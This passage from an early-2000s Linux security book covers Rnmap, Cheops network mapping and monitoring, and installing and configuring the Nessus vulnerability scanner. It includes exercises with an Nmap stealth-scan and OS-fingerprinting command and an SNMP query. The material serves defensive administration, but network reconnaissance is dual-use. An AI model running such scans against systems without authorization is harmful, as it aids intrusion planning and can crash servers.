6/20/01 9:36 AM Page 148 +148 Chapter 3 • System Scanning and Probing +If you do not see any references to Python,download it from www.rpmfind +.net,or obtain it from your installation disks.If you do not use RPM,you can +search for the file using the find command: +find / -name python +Usually,the python interpreter is located at /usr/bin/python.Once Python is +installed,you can then use the client and the server after unzipping them from +their tarfile.No compilation is necessary,because the scripts for the server and +the front end use the python interpreter.Because Python is portable between +various operating systems,Rnmap is equally as portable. +Exercise: Scanning Systems with Rnmap +1. Copy rnmap_0.5.2-beta.tar.gz from the accompanying CD.Alternatively, +go to http://rnmap.sourceforge.net and obtain version 0.5-beta of +Rnmap.You must also have the Nmap application on the machine that +will act as the server.If you wish to install a more current version of +Rnmap,do so.However,the steps of this exercise are written for version +0.5-beta. +2. Once you have downloaded Rnmap,unzip and untar the file using the +following command: +tar -zxvf Rnmapfile.tar.gz +3. Unzipping and untarring this file creates the Rnmap directory.Change +to it now. +4. Make sure that you have Nmap installed.The server uses the standard +Nmap binary to make queries and then provide access to the client. +5. Once you have verified that Nmap is installed and have uncompressed +the Rnmap files,you are ready to go.Remember,because Rnmap is +written in Python,you do not have to compile anything.Remember, +though,that Rnmap supports user-based access.In the server subdirec- +tory,issue the following command to add a user: +./rnmap-adduser +6. You will be asked for a username.Enter your username of choice. +7. Enter a password.You will be asked to confirm it. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 149 +System Scanning and Probing • Chapter 3 149 +8. When you confirm your password,you may receive several error mes- +sages.This is because you have not yet started the server.Generally,it is +best to add a user first,because the server tends to not re-read the +users.list file,which contains the username and password information. +Once you start (or restart) Rnmapd,it will then correctly read the file. +9. Now that you have added a user,change to the server subdirectory,and +begin the server as shown: +./rnmapd +10. You are now ready to use the client to connect to this server.Change to +the client subdirectory.If you are in the server subdirectory,all you have +to do is enter the following command: +cd ../client +11. List the directory.You will see that two files are in it.The file named +grnmp.py is the GUI client,and the file named rnmpa.py is the com- +mand-line client.The GUI client is useful when using Rnmap interac- +tively (i.e.,when you are sitting in front of the computer).The +command-line client is useful when using Telnet or SSH.To use the +GUI client,issue the following command: +./grnmap.py +You will see the client shown in Figure 3.16. +12. Enter the name of the host you wish to scan. +13. Enter the Login ID and password you created in steps 6 and 7. +14. Select OS Detect,Verbose,Fragment IP,and FIN scan,and then +click Scan.If you have entered the right password and the server is run- +ning,the scan will complete.If you receive a message that reads “Can’t +connect to remote host,”then the server is not running.If you receive +an “Access denied”message,then you have used the wrong password. +Verify your username and password information in the client,and then +retry the connection.If this doesn’t work,add a new username and +password,and kill and restart the server if necessary.When you are +successful,you will see a screen similar to Figure 3.17. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 150 +150 Chapter 3 • System Scanning and Probing +15. Now that you have verified the server is running,transfer the grnmap.py +file to a remote Linux host and use it to contact your server.As long as +this remote Linux host is using Python,it will work.Notice that this file +is extremely small,and is thus quite handy.You can keep it on any +system,or even on a floppy,along with several other files.Finally,you +could use this file on a Windows system,if you wish,because Windows +systems support the Python language and interpreter.For more informa- +tion,go to www.python.org. +Figure 3.16 The Rnmap GUI Client +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 151 +System Scanning and Probing • Chapter 3 151 +Figure 3.17 A Completed Rnmap Scan +Deploying Cheops to +Monitor Your Network +Cheops,developed by Mark Spencer,is intended as a network management tool. +Its chief functioning features include: +(cid:2) Automatic network scans to add all hosts present on the network +(cid:2) A graphical network map of each host that shows the default gateway +for the network +(cid:2) The ability to provide crude port scans for each host +(cid:2) Operating system identification +(cid:2) Active monitoring of remote systems to see if the host is up,or if a +particular service is up and running +(cid:2) The ability to manually add or delete a host from the map +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 152 +152 Chapter 3 • System Scanning and Probing +(cid:2) The ability to add an entire IP network or DNS domain to the map, +and then have Cheops automatically add new hosts to the map +(cid:2) The use of the Simple Network Management Protocol (SNMP) to +query hosts +(cid:2) Resolution of DNS names (including reverse DNS lookup) +(cid:2) Use of ping or traceroute on each host on the map +(cid:2) Ability to access the network services (e.g.,FTP,Telnet,and SSH) provided +by a host on the map +NOTE +The most impressive feature that Cheops offers is scalability. You can +configure Cheops to launch any application you wish to further help you +determine the nature of a host. You will learn how to do this in the exer- +cise later in this section. +Billed as a graphical network neighborhood,Cheops is related to applications +such as HP OpenView.HP OpenView is a sophisticated,expensive graphical +front end that uses SNMP,a protocol that allows you to monitor remote systems. +Both Cheops and HP OpenView allow you to create a graphical map of the net- +work,and then manage any host on that map.Although Cheops is not nearly as +sophisticated,it still allows you to quickly learn which hosts are up on a partic- +ular network segment. +The Simple Network Management Protocol (SNMP) helps you gain infor- +mation from remote systems.It can also be used to set operating system values.It +is commonly used on routers,as it can be used to change routing values,IP +addresses,and any element of the operating system.SNMP requires that the +remote system install small daemons,called agents,that accept commands from an +application commonly called a “Network Management Station”(NMS). +Examples of NMS applications include snmpwalk,snmpget,and Scotty.In the +Windows world,the HP OpenView application is especially popular.Using NMS +applications,it is possible to issue queries to agents to learn information such as: +(cid:2) The configuration of the operating system,including IP addresses,active +interfaces,and defined users. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 153 +System Scanning and Probing • Chapter 3 153 +(cid:2) Processes currently running on the operating system. +(cid:2) The amount of IP,ICMP,TCP,and UDP traffic that has passed through +an interface. +(cid:2) A count of the number of routers a packet is supposed to travel through +before it reaches a particular network.This number is often known as a +hop count. +If the system agents are allowed to write values to the operating system,it is +possible to have these agents actually change the configuration of the operating +system.For example,agents can change the IP address on some operating sys- +tems.For more information about how SNMP works,install the UCD SNMP +tools (discussed later in this chapter),and consult the snmpwalk and snmpget +man pages.You can also learn more about SNMP at the Research Web site +(www.snmp.org). +How Cheops Works +Cheops issues network broadcasts,and then processes these replies to discover +remote hosts.Some older versions of Cheops use an application called Queso to +read the replies of remote systems.Queso is similar to Nmap,although not as +sophisticated or recent.Still,like Nmap,Queso uses stack fingerprinting to guess +the operating system of a remote server.Once Cheops makes a guess as to the +remote operating system,it will provide an icon that represents that remote host’s +operating system.Although Queso is quite old,it is still remarkably accurate for +today’s systems.Newer versions of Cheops use Nmap.However,some of the +newer betas do not work as well on Linux systems,so it is recommended that +you use Cheops version 0.59a-1 which can be found on the accompnying CD. +An equivalent RPM version is also on the CD.You will see how it is possible to +use Nmap with Cheops later in this chapter. +NOTE +Cheops also issues standard ping scan and port scan techniques to learn +about a host’s available systems. One of its more useful features is the +ability to specifically listen to remote system SNMP ports (161 and 162). +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 154 +154 Chapter 3 • System Scanning and Probing +Obtaining Cheops +You can obtain Cheops from any Red Hat 7.0 Power Tools CD,or from +www.marko.net/cheops.Although the site provides a tarball file,the RPM works +best for Red Hat systems. +Required Libraries +Cheops will run well on most Linux systems (we tested Cheops on Caldera, +TurboLinux,Red Hat,and SuSE).You must,however,have the following gtk, +glib,and SNMP packages installed first: +(cid:2) gtk+10-1.0.6-9 or higher. +(cid:2) glib10-1.x +(cid:2) ucd-snmp +(cid:2) ucd-snmp-devel +(cid:2) ucd-snmp-utils +(cid:2) All libraries associated with a graphics editing application called “The +Gimp”(www.gimp.org),especially the gimp-devel package.Any package +for Red Hat 6.2 or later,for example,will work,if you are using Red +Hat Linux.Once you have installed GIMP and the additional libraries +mentioned previously,you then have the libraries necessary to run +Cheops. +Open source applications often require that you spend time adjusting sup- +porting libraries on your system.Sometimes,adjusting one supporting library +requires you to adjust other libraries,because of dependencies.Sometimes,this +can be very frustrating.The following is a list of all gtk libraries installed on a +Red Hat 7.0 and Red Hat 7.1 system,respectively: +(cid:2) gtkglarea-1.2.1-1 +(cid:2) pygtk-libglade-0.6.6-4_helix_2 +(cid:2) rep-gtk-gnome-0.15-0_helix_2 +(cid:2) gtk+-devel-1.2.8-7_helix_1 +(cid:2) gtk-engines-0.10-9_helix_1 +(cid:2) gtk+10-1.0.6-9 +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 155 +System Scanning and Probing • Chapter 3 155 +(cid:2) pygtk-0.6.6-4_helix_2 +(cid:2) rep-gtk-libglade-0.15-0_helix_2 +(cid:2) gtkmm-1.2.1-8 +(cid:2) gtk+-1.2.8-7_helix_1 +(cid:2) rep-gtk-0.15-0_helix_2 +(cid:2) pygtk-0.6.6-4 +(cid:2) rep-gtk-libglade-0.13-3 +(cid:2) gtk+-1.2.8-7 +(cid:2) gtk-engines-0.10-9 +(cid:2) pygtk-libglade-0.6.6-4 +(cid:2) rep-gtk-gnome-0.13-3 +(cid:2) gtk+10-1.0.6-9 +(cid:2) gtk+-devel-1.2.8-7 +(cid:2) rep-gtk-0.13-3 +(cid:2) gtkmm-1.2.1-8 +Other combinations are possible;your system’s supporting libraries may vary. +You can obtain the gtk+ and glib libraries either from your distribution disk,or +www.rpmfind.net.The SNMP packages are important only for their libraries.You +do not have to run the SNMP daemon in order to use Cheops,because the +application simply uses the libraries,not the actual daemon.Most Linux distribu- +tions include these SNMP packages,although you can obtain these at +www.rpmfind.net as well. +The Cheops Interface +When you first start Cheops,you will see the Cheops Auto-scan dialog box, +shown in Figure 3.18.If you click Yes,Cheops will begin to scan your network. +Figure 3.18 The Cheops Initial Scan Dialog Box +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 156 +156 Chapter 3 • System Scanning and Probing +Once Cheops finishes processing replies from remote hosts,the main Cheops +interface will appear,as shown in Figure 3.19. +Figure 3.19 Viewing a Small LAN in Cheops +Of course,it is possible to map much larger networks.In fact,Cheops has +been used to map hundreds of hosts,as well as trace the routers between hosts all +across the Internet. +NOTE +As with many applications, Cheops works best on a nonswitched LAN. +However, it is possible for it to obtain valid responses in switched +environment. +Cheops refers to the default screen as a page.You can create additional +pages for additional networks or hosts,if you wish.You can then right-click on +individual hosts to conduct simple port scans. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 157 +System Scanning and Probing • Chapter 3 157 +Mapping Relations between Computers +Nmap allows you to determine routing in your network.You can do this by +right-clicking on the actual page,and then select the Map | Map option. +Mapping the network will cause Cheops to automatically generate lines between +each host.These lines,shown in Figure 3.20,show how each host is related to the +network’s default gateway. +Figure 3.20 Viewing a Small Network Map Generated by Cheops +Cheops Monitoring Methods +Cheops is capable of two types of monitoring.First,it can have your Linux +system issue simple ping requests to see if a remote host is up.If the host is up +and responding,it receives a green icon.If a host does not respond,the network +host will appear red.You should understand,of course,that a host is not neces- +sarily down just because a host does not respond to ping requests.It is possible, +for example,that an intervening firewall is blocking ping requests between your +host and the remote system .It is also possible that the host you are monitoring +has been configured to not respond to ping requests. +The second type of monitoring at least partially solves this problem.Instead of +relying on a crude ping request,Cheops allows you to pick a specific service +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 158 +158 Chapter 3 • System Scanning and Probing +offered by the remote host.If,for example,you wish to monitor Apache Server on +a remote Solaris host,you can configure the monitor daemon to test that port. +To enable monitoring for a specific host,all you have to do is right-click on +its icon,and then select the Monitoring? option.Figure 3.21 shows monitoring +being enabled on the FTP and Web servers for the machine named +sandi.stangernet.com. +Figure 3.21 Monitoring Systems Using Cheops +Once you click Save or Close (available in version 0.59 of Cheops),you will +then be able to monitor if and when the Web and FTP server goes down by +seeing the icon turn from green to red.You can also view past alerts by going to +View | Event log to bring up the General Event Log,shown in Figure 3.22.You +can then acknowledge an individual message,or all messages.Acknowledging the +messages clears them from the log. +Figure 3.22 The General Event Log +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 159 +System Scanning and Probing • Chapter 3 159 +Connectivity Features +You can use Cheops to connect to remote systems.If their services,such as Web, +FTP,SSH,and Telnet,are up and running,all you have to do is right-click on the +icon,and then select the service you want to use.When you right-click on the +icon,the resulting menu is context sensitive for each system.This list will contain +only those services that are currently running on this system.If,for example, +system A is running SSH and a Web server,and system B is running a Telnet and +an FTP server,the menu will be different for each system. +However,two menu items will always be the same:ping and traceroute.You +can specify different “helper”applications with this interface.For example,when +you indicate that you want to use traceroute,Cheops will automatically open a +terminal.You may not like the looks of this default terminal.In some cases,the +default terminal may not appear correctly in your X session.You can change the +default terminal by going to the File | Options menu and selecting the Helpers +tab.You can then use the drop-down box to specify another terminal emulator,or +you can enter your own command. +Notes from the Underground… +Cheops-ng +Cheops-ng is a more recent version of Cheops. It uses an agent-manager +structure. However, when it comes to Linux systems, Cheops-ng is not as +stable as Cheops is. At your own risk, you can download Cheops-ng at +http://sourceforge.net/projects/cheops-ng. If you use a Linux system, +using the RPM is highly recommended. Version 0.0.1.3 does not compile +properly on Red Hat 7.0 when installing it from a tarball. +You must also install Nmap. However, the OS detection feature cur- +rently does not work properly in Cheops-ng version 0.1.1 (the RPM ver- +sion), because it searches for Nmap in the wrong location. Additional +required libraries for Cheops-ng include adns (www.gnu.org/software/ +adns), gnome, and libpcap (libpcap is on the accompanying CD). All but +adns are installed by default in Red Hat 7.0 systems, and all of the RPM +packages are available at www.rpmfind.net. +Once you install Cheops-ng, you first run the /usr/sbin/cheops-agent +daemon. You can then use the cheops-ng client to access the agent to +Continued +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 160 +160 Chapter 3 • System Scanning and Probing +map the network. One of the exciting things about Cheops-ng (when it +works) is that you can use the Cheops-ng client to contact remote +agents. These agents can then scan your system. The connection is +encrypted, so any transmissions you make are relatively secure. This +chapter does not focus on Cheops-ng because it is not stable at this +point. Cheops-ng is, however, a promising project. Check its home page +over time to see if it becomes truly stable. +Now that you have learned about the most salient features of Cheops,it’s +time to investigate how the program works.Although many different Cheops fea- +tures vary from version to version,one of the more stable versions is 0.59a,and it +is used in the following exercise. +Exercise: Installing and Configuring Cheops +1. Install Cheops and all supporting libraries. +2. Start Cheops by issuing the following command:cheops &. +3. Indicate that you do want to automatically scan for network hosts.What +did you find? +4. If you did not find anything,go to Page | Edit.This menu allows you +to configure the networks that Cheops will scan and report.If necessary, +remove any entries that are not appropriate for your network by clicking +Remove Host/Network.Now,click Add Host/Network. +5. Add the network address,followed by the subnet mask.Remember,a +network address does not contain the host portion of your particular IP +address.When you are finished,click OK. +6. Click Update. +7. Now,quit and restart Cheops.Have Cheops rescan your network to dis- +cover hosts. +8. You may have to add a few more hosts that were not scanned.You can +do this by going to Page | Add host,and then entering the name or +IP address of the host you want. +9. Now,go to Page | Map to see how well Cheops maps the topology of +your network.It is possible that Cheops will see your system as a router, +even if it is not.This is a quirk of Cheops,because sometimes it will +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 161 +System Scanning and Probing • Chapter 3 161 +identify the computer from which it is run as the router.Remember, +this is open source code,after all. +10. The default setting is to use large icons to represent the hosts.Right- +click on an empty part of the page,then select the View | List option, +and then select the View | Small Icons option.You can return to the +default view by selecting View | Icons. +11. Now,enable monitoring for a remote system.Ping the host to make sure +it is up and responding to ping requests. +12. Instead of having to ping the system yourself,have Cheops do it for you. +Highlight the system,and then right-click it. +13. Select the Monitoring? option. +14. First,do a simple monitoring test.Select the Availability (Ping) option. +Change the frequency to 1 minute by changing the every entry to 1. +15. Click Save. +16. The icon for the host you are monitoring should be green.Now,shut +down the remote system. +17. The icon for that host will turn red after a short time,because it has +been configured to report the remote server’s condition.Now,open the +Event log and view the alert. +18. Now,restart the remote system.You will see that the icon automatically +turns green.Edit this setting so that it is more reasonable. +19. Next,right-click on this server and select the Scan? option.Cheops will +conduct a scan,and when it is finished,Cheops will generate a report. +Now,click More,and you will see a report similar to that shown in +Figure 3.23. +20. Notice that the bottom window gives you more information about the +daemons running on the remote system.Cheops 0.59a-1 uses a program +called Queso to learn the operating system type.Because Cheops is a +TCP/IP fingerprinting application,it is somewhat effective,but it is not +maintained as actively as is Nmap.Configure Cheops to offer Nmap as a +plug-in.Go to File | Options,and then select the Services tab. +21. You will see a list of predefined services.This window allows you to +configure applications to contact different systems or ports.If,for +example,you enter 0 in the Port field,and Cheops recognizes this +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 162 +162 Chapter 3 • System Scanning and Probing +remote system as a responding system,Cheops will provide this option +when you right-click on a host.You can then launch the application +specified in the Command text box.If you enter an actual port,such as +port 80,then this option will be presented only if that particular port is +open.You can also use macros to make your commands more context +specific.The %i macro,for example,allows you to specify the remote +system’s IP address.Cheops will fill this value in automatically.The %h +macro allows you to specify the remote system’s host name.Additional +macros exist,and are explained in the interface.Now,click Add and +enter Nmap in the Name field. +Figure 3.23 Viewing a System Scan in Cheops +22. In the Port field,enter 0. +23. In the Command field,enter the following text string: +%x -T 'We are going to Nmap %h' -e sh -c '/usr/bin/nmap -sS -O +-P0 %I && read a' +Make sure there is no space between the two ampersand characters, +&&.In addition,make sure you use the standard apostrophe character +(the one below the double quotes character to the right of your key- +board) to enclose the Nmap command. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 163 +System Scanning and Probing • Chapter 3 163 +This text string has Cheops launch a terminal with the title of ‘We +are going to Nmap hostname’,and then execute a shell,which then +launches Nmap to conduct a stealth scan,an operating system identifica- +tion.The host will not be pinged during the scan.The final part of the +command has the terminal remain on the screen so you can read it. +Otherwise,the terminal would completely disappear as soon as Nmap +finished,making it impossible to read the output.Figure 3.24 shows the +completed command. +Figure 3.24 Creating an Entry for Nmap in Cheops +24. Click OK. +25. When you are finished,you will see your entry among all of the others, +as shown in Figure 3.25. +Figure 3.25 Viewing Cheops Command Entries +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 164 +164 Chapter 3 • System Scanning and Probing +26. Click Save to return to the Cheops main interface. +27. Right-click a functioning host.You will see your new entry appear. +28. Select your new Nmap entry and note the scan. +29. You have now configured Cheops to conduct a useful scan of your net- +work hosts using a current piece of software. +30. Consider additional commands you could configure,including dig,snm- +pwalk,and any other application that can help you further monitor your +network. +31. Now,create another plug-in option by entering the following command: +%x -t 'SNMPWALK of %h' -e sh -c 'snmpwalk %i publicname |less +&& read a' +32. This command has the program named snmpwalk query the system +using the public name of “publicname.”Any system that has SNMP +installed,and uses the public name of “publicname”will respond.You +should,of course,change the public name to the one used on your sys- +tems and routers. +33. Consider additional plug-ins.You can configure plug-ins to use com- +mands such as snmpget,snmpset,host,GSS,or any others you wish +you use.In addition,consider the different types of systems you wish to +scan.For example,what applications would you want to configure if you +used Cheops to monitor a DNS server,as opposed to monitoring a col- +lection of routers and switches? +34. Cheops can send you its log messages by e-mail.This is an excellent way +to check Cheops logs without first having to log in to the server.Go to +File | Options,then select the Event Log tab.Enter the host name or +IP address of the e-mail server you normally check every day to get +your e-mail.Each event that Cheops logs,such as when your Web server +goes down or comes back up,will be sent to you as it happens. +You can now monitor systems and gather information about the services they +are offering from a central console.You will find that such software significantly +increases your ability to monitor the network and determine if any hosts have +been brought down by attacks. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 165 +System Scanning and Probing • Chapter 3 165 +NOTE +Cheops may crash and lose all of the service plug-ins you have defined, +as well as the default plug-ins. You will find out that you have lost all of +these services when you right-click an icon and are unable to choose any. +Remember that Cheops creates the .cheops directory in your home direc- +tory. If you lose your services, search for the ~/.cheops/services file. If it is +empty, but present, delete the file. You will then get at least your default +services back. However, you will lose all of the plug-ins you have config- +ured. The best way to protect yourself against losing these plug-ins is to +create a backup of the ~/.cheops/services file. If it is lost, you can then +recopy the backup file in the place of the original. +Deploying Nessus to +Test Daemon Security +Thus far,you have learned how to use port scanning and monitoring devices. +These applications are quite effective in determining if your server is up and run- +ning.They are perfect tools if you want to find out what type of service is lis- +tening.However,using vulnerability detection software,you can find out exactly +what specific application is listening on that port.A good hacker is well informed +concerning the popular servers on the Internet,and can quickly take advantage +of a specific daemon that has a security problem. +Nessus allows you to proactively scan your systems to determine its weak- +nesses.Nessus is comprised of a server and a client.The server runs only on +Linux systems,whereas clients exist for Linux,Windows,and Macintosh systems. +The Nessus home page is shown in Figure 3.26. +Although no scanner can offer you a 100-percent solution,this scanner is +updated often,and is in wide use.It will scan for the following types of problems: +(cid:2) Old daemon and service versions that have known security issues +(including sendmail,Finger,NIS,and NFS) +(cid:2) Writeable anonymous FTP directories +(cid:2) Open X Windows ports.X Windows ports can allow unauthorized users +easy access to the system. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 166 +166 Chapter 3 • System Scanning and Probing +Figure 3.26 The Nessus Home Page +(cid:2) CGI issues concerning Web servers +(cid:2) Backdoors,Trojans,and DDOS daemons,such as TFN2k +(cid:2) Extraneous services that have been activated and left running on a +system.Just because you have deactivated a service using Bastille,doesn’t +mean that the service will remain deactivated. +(cid:2) Backdoors,which are daemons and applications that defeat your system’s +authentication measures by opening ports that are tied directly to a login +shell. +Nessus uses special files,called plug-ins,to provide the “brains”for Nessus. +You will learn how to update these plug-ins later in this chapter.Current ver- +sions of Nessus use port 1241.Older versions of Nessus (anything earlier than +version 1.0) used port 3001. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 167 +System Scanning and Probing • Chapter 3 167 +SECURITY ALERT! +Like many scanners, Nessus contains various plug-ins that simulate +attacks. Some of these plug-ins simulate attacks so effectively that they +can crash systems. Although Nessus cannot destroy information on a +remote system, it can: +(cid:2) Issue an attack against the system so that it crashes. In other +words, Nessus can conduct a DoS attack on your system while +testing its ability to withstand DoS attacks. +(cid:2) Generate vast amounts of network traffic that can affect end +users on the network. +It is a good idea to schedule your Nessus scans for off-peak hours. Be +prepared to restart various servers. Most importantly, make sure that any +server you scan with Nessus can be brought offline for a short period of +time. The last thing you want to do is bring about an unplanned crash to +a production server in the middle of the business day. +The Nessus Client/Server Relationship +The Nessus client,shown in Figure 3.27,allows you to connect to the Nessus +daemon,which is usually on a remote server.Several different clients exist, +including those for Windows,Macintosh,and Unix/Linux systems.You will learn +more about the Windows client shortly.You can configure your Nessus daemon +to expect encrypted (called “cipher”) or plaintext authentication.The wisest +course of action is,of course,to choose cipher authentication,because it is more +secure and because Nessus defaults to cipher mode. +When you launch the client for the first time,it will take some time to create +a public key pair,which will be used to authenticate with any Nessus daemon. +In Figure 3.27,the Linux Nessus client has logged in to the host named +Keats,using the username of nessusremote.It is very important that you under- +stand that you must first log in to the Nessus server.Here are some addition +things to remember when using any Nessus client: +(cid:2) When the client first launches after compilation,it will ask you to create +a password.This password has nothing to do with authenticating with +the server.It is simply there to prevent an unauthorized user from +accessing the client. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 168 +168 Chapter 3 • System Scanning and Probing +Figure 3.27 The Nessus Client +(cid:2) Whenever you launch any Nessus client,the client is not logged on to +any Nessus daemon.You will have to enter the Nessus host name,port, +and login name,and then click Log In to connect.You must,of course, +have the correct account created on the Nessus host,or authentication +will fail.You will learn more about creating usernames for remote hosts +later in this chapter. +(cid:2) Once you log in,you will be presented with a list of plug-ins.You can +then choose and configure them according to your preferences.If you +are not logged in,the plug-ins menu will be blank. +(cid:2) When you have logged in and chosen the plug-ins you wish to use,you +must then click the Target Selection tab to choose a target host. +Once you have completed a scan,you will see a report similar to that shown +in Figure 3.28.When you have finished a scan,Nessus will do one of two +things—either finish and inform you that no errors were found,or issue a reports +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 169 +System Scanning and Probing • Chapter 3 169 +summary.You can double-click on the left-hand pane to see the individual alerts. +As shown in Figure 3.28,you can then expand these alerts to learn more about +the nature of the problem and how to solve it. +Figure 3.28 Viewing a Report Generated by the Linux Nessus Client +Windows Nessus Clients +Several Windows clients exist,although WinNessus is the most reliable.As you +can see in Figure 3.29,its interface is almost identical to the Linux client. +Required Libraries +Nessus requires the following libraries and applications: +(cid:2) GTK The Gimp Toolkit,available at www.gimp.org,or at +www.rpmfind.net. +(cid:2) Nmap Available at www.insecure.org. +(cid:2) m4 A macro utility used by many applications and daemons.It is +standard equipment for most systems.You can obtain it from +www.rpmfind.net. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 170 +170 Chapter 3 • System Scanning and Probing +Figure 3.29 The WinNessus Client +In short,if you have installed the Graphics Image Manipulation Program +(GIMP),you can install Nessus. +Order of Installation +Although the prebuilt RPM packages are useful,they do not provide additional +features that allow you to conduct unattended and partial scans.You will learn +more about these shortly.Thus,you should install Nessus from the tarball format. +Regardless of the Nessus version you install,you must install the following +tarball files in the following order,as root: +1. nessus-libraries-1.0.7a.tar.gz +2. libnasl-1.0.7a-1.tar.gz +3. nessus-core-1.0.7a-1.tar.gz +4. nessus-plugins-1.0.7a-1.tar.gz +These files are all available at www.nessus.org and on the CD accompanying +this book.Compiling these individual libraries is straightforward. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 171 +System Scanning and Probing • Chapter 3 171 +1. Once you run gunzip against the nessus-libraries tarball,the tarball will +create the nessus-libraries directory.Change to this directory,and then +run the following commands: +./configure +make +make install +2. Make sure that /usr/local/bin is in your system path If you install Nessus +using RPMs,all files are installed in /usr/bin.You can verify your system +path by entering the following command: +echo $PATH +3. Repeat these steps for the libnasl package. +4. Once you get to the nessus-core package,you have one compilation +option available to you.The following command and argument allows +Nessus to conduct differential,detached,and continuous scans (you will +learn more about these,later): +./configure --enable-save-kb --enable-save-sessions +5. Once you have compiled the nessus-core package,repeat the +./configure,make,and make install steps for the nessus-plugins. +6. Then,using a text editor,enter the following line into the +/etc/ld.so.conf file: +./usr/local/lib +7. To make sure these changes take effect,enter the following command, +still as root: +ldconfig +What If I Don’t Want to Use X? +If you want your server to act as a Nessus daemon,and not support the X client, +you can disable gtk support by issuing the following argument to the ./configure +script when installing the nessus-core package: +./configure --disable-gtk ; make && make install +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 172 +172 Chapter 3 • System Scanning and Probing +RPM-Based Installations +If you wish to install Nessus by using the RPMs,you would install the files in the +following order: +1. nessus-common-1.0.7a-1.i386.rpm +2. nessus-server-1.0.7a-1.i386.rpm +3. nessus-plugins-1.0.7a-1.i386.rpm +4. nessus-devel-1.0.7a-1.i386.rpm +5. nessus-client-1.0.7a-1.i386.rpm +Each of these files is available at the www.nessus.org site and on the CD +accompanying this book.Look for a special link at www.nessus.org that takes you +directly to the RPM files.Understand,however,that most RPM binary installa- +tions have not been compiled with the --enable-save-kb feature,which allows +you to conduct detached and differential scans.If you do not want to use the X +client when installing with RPMs,do not install the nessus-client package. +NOTE +When you first create a remote user using nessus-useradd, this remote +user will use a one-time password that is passed across the network. +Although the password is encrypted, it is still never a good idea to allow +even encrypted passwords to regularly cross a network. Nessus, however, +does this only once, because as soon as a Nessus user authenticates +using the one-time password, the public keys are exchanged, and all sub- +sequent authentication occurs using your public key. No password infor- +mation will ever cross over the network, at least as far as this Nessus +client and server are concerned. +You can learn about a particular nessusd’s configuration, including its +ability to conduct differential and detached scans, by issuing the fol- +lowing command: +/usr/local/sbin/nessusd -d +The resulting output will inform you about the server version, as well +as its ability to enter KB saving mode. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 173 +System Scanning and Probing • Chapter 3 173 +Configuring Plug-Ins +Some of the plug-ins require you to enter additional settings in order to run +effectively.For example,FTP,e-mail,and login checks often require you to enter +default user account information.It is also possible to configure the FTP plug-in +to actually store a file in the FTP directory to prove that it is writeable. +Additional options exist,including those for Nmap.Figure 3.30 shows some of +the options that you can configure. +Figure 3.30 Configuring Nessus Preferences +These options are available once you open the Nessus client and connect to a +Nessus server.For specific steps on connecting the client to the server,consult +the exercise later in this section.Notice that you can configure Nessus to forego +using ICMP,and you can configure various Nmap settings.The preferences you +configure here will apply to all scans you make using this client.The client will +try to impose these settings on all additional servers. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 174 +174 Chapter 3 • System Scanning and Probing +Creating a New Nessus User +Before you can use your Nessus client,you must define a user using /usr/local/ +sbin/nessus-adduser,an interactive application that creates users in the ~/.nessus +.keys file.Two types of users exist in regard to Nessus: +(cid:2) Local These users are listed as username@127.0.0.1.These users can +access Nessus only from the local system. +(cid:2) Remote Users that are allowed to access nessusd remote systems.They +will be listed as username@remote-ip-address,where remote-ip-address +is the one you specify in the /usr/local/sbin/nessus-adduser program. +Nessus-adduser allows you to add the users who are allowed to connect to the +Nessus daemon and conduct scans.The process of adding local and remote users is +quite different.Although you use nessus-adduser to add both,when you specify +that you want to add a local user,Nessus will create a local key pair for this user. +This key pair will be used to authenticate with the local nesssd daemon only. +If you wish to add a remote user,you must first take the following steps: +1. Using useradd or Linuxconf,add the user who will become a remote +Nessus user. +2. Launch nessus-useradd and add this same user. +3. Tell nessus-useradd that this user is not a local user. +4. Specify the IP address of the machine from which this user can connect. +It is best to specify a single machine,but if you wish,you can specify an +entire network.However,most versions of Nessus will automatically +map this user account to the one IP address on the network that first +makes the connection.Thus,even though you think you have allowed a +user named nesussadmin to connect to a nessus daemon from the entire +192.168.3.0 network,if you connect to this daemon from the +192.168.3.75 host,this one host will be the only one that can use the +nessusadmin account. +The Rules Database +Whenever you configure a new client in nessus-adduser,you will be asked +whether you wish to apply a set of rules on this user.These rules determine the +hosts that this user can scan.If the rules database is left blank,then the user can +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 175 +System Scanning and Probing • Chapter 3 175 +scan all hosts.The following is an example of a rule set that allows a user to scan +one host,and nothing more: +accept 10.100.100.1/24 +default deny +The default deny entry forbids everything that is not specifically +allowed.This particular list is likely too restrictive to be useful.Try the following: +accept 10.100.100.0/24 +192.168.2.0/24 +default deny +Now,a user with this rule set applied can scan all hosts in the +10.100.100.0/24 and 192.168.2.0/24 networks.For more information about +Nessus,consult the nessus,nessusd,and nessus-adduser man pages,or the FAQ +page at www.nessus.org. +SECURITY ALERT! +There may be times that you will have to reconfigure a server, and you +may lose the private key of your Nessus server. If this happens, this +server’s public key that your client uses to connect to this Nessus host +will also become invalid. You will know this when your client informs you +about a “spoof alert.” If this happens, edit or delete the .nessus.keys file +in your home directory. When you add a new user to your Nessus host, +you can then connect to this host. It will then send you a new public key, +and you will be able to 